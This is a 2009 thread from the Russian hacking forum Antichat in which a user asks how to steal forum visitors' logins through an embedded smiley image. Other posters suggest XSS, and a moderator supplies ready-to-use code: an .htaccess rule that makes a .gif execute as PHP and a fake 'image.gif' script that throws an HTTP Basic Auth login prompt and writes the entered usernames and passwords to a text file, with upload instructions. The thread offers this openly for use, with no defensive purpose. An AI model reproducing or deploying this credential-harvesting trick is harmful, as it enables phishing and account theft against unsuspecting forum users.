Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
[help] Сбор паролей с помощью смайлов |
18.11.2009, 05:30
|
|
Познающий
Регистрация: 27.03.2008
Сообщений: 80
Провел на форуме:
322368
Репутация:
44
|
|
[help] Сбор паролей с помощью смайлов
Доброго времени суток всем.
Давно где-то тут наткнулся на статью или сообщение,не помню точно.
Где описывалось,что вставляя в код картинки определённый код и затем в сообщениях на форумах после того как пользователь увидел этот смайл,то у него вытелао окно где просило ввести логин и пароль,после чего логин и пароль сохранялся у меня.
Облазил всю ветку статей,но не нашёл этого.
Может кто-нибудь даст ссылку на это чудо.
Последний раз редактировалось mixdw; 18.11.2009 в 05:37..
|
|
|
18.11.2009, 06:27
|
|
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199
Репутация:
258
|
|
forum.xakep.ru/m_1397502/tm.htm
forum.xakep.ru/m_1212796/tm.htm
про права на файлы не забудь.
|
|
|
|
18.11.2009, 06:58
|
|
Познающий
Регистрация: 27.03.2008
Сообщений: 80
Провел на форуме:
322368
Репутация:
44
|
|
Первая ссылка,больше всего похожа на то что я имел введу,но мне не надо именно под укоз.
|
|
|
|
18.11.2009, 07:12
|
|
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199
Репутация:
258
|
|
В чем проблема?
Ищи xss и в бой.
|
|
|
|
18.11.2009, 07:20
|
|
Познающий
Регистрация: 27.03.2008
Сообщений: 80
Провел на форуме:
322368
Репутация:
44
|
|
Увы с xss не знаком и не хочу заниматься тем чем не знаком.
Решил попроще что-нибудь,т.е. то что в первом посту.
|
|
|
|
18.11.2009, 13:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635
Репутация:
2407
|
|
Первая ссылка,больше всего похожа на то что я имел введу,но мне не надо именно под укоз.
Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.
|
|
|
|
19.11.2009, 15:16
|
|
Познающий
Регистрация: 27.03.2008
Сообщений: 80
Провел на форуме:
322368
Репутация:
44
|
|
Сообщение от d_x
Первая ссылка не именно под юкоз, такое можно применить к любому сайту или форуму, где есть возможность вставки изображения.
при переходе на картинку с кодом image.gif выдаёт ошибку,что невозможно открыть файл.
|
|
|
|
20.11.2009, 10:23
|
|
Участник форума
Регистрация: 21.02.2008
Сообщений: 255
Провел на форуме:
975514
Репутация:
177
|
|
потому что твой веб-сервер должен этот файл как php-скрипт обработать.
у тебя ведь апаче? используй mod_rewrite или директиву AddType
|
|
|
|
21.11.2009, 07:14
|
|
Познающий
Регистрация: 27.03.2008
Сообщений: 80
Провел на форуме:
322368
Репутация:
44
|
|
у меня vertrigo.
используй mod_rewrite или директиву AddType
А поточнее,это куда вписывать надо?
Хотя раньше у меня вот этот смайл запускался на вертриго или я ошибаюсь,может то не вертриго был.
|
|
|
|
21.11.2009, 10:58
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155
Репутация:
719
|
|
создаешь 3 файла:
1. .htaccess
содержимое
PHP код:
<files "image.gif">
AddType application/x-httpd-php .gif
</files>
2. image.gif
содержимое
PHP код:
<?
$filevalid = 'accs.txt';
$good = fopen($filevalid, 'a+');
header("WWW-Authenticate: Basic realm=\"Access Forbidden\"");
header("HTTP/1.0 401 Access Forbidden");
if (isset($_SERVER["PHP_AUTH_USER"]) ) {
$user = $_SERVER["PHP_AUTH_USER"];
$pass = $_SERVER["PHP_AUTH_PW"];
fwrite ($good, $user.';'.$pass."\n");
header("HTTP/1.0 200 Login");
//exit("test");
}
?>
3. accs.txt
пустой
Заливаешь на сервак и проставляешь права файлу accs.txt. Тут готовый тестовый вариант.
Вроде все.
Последний раз редактировалось satana-fu; 21.11.2009 в 11:11..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
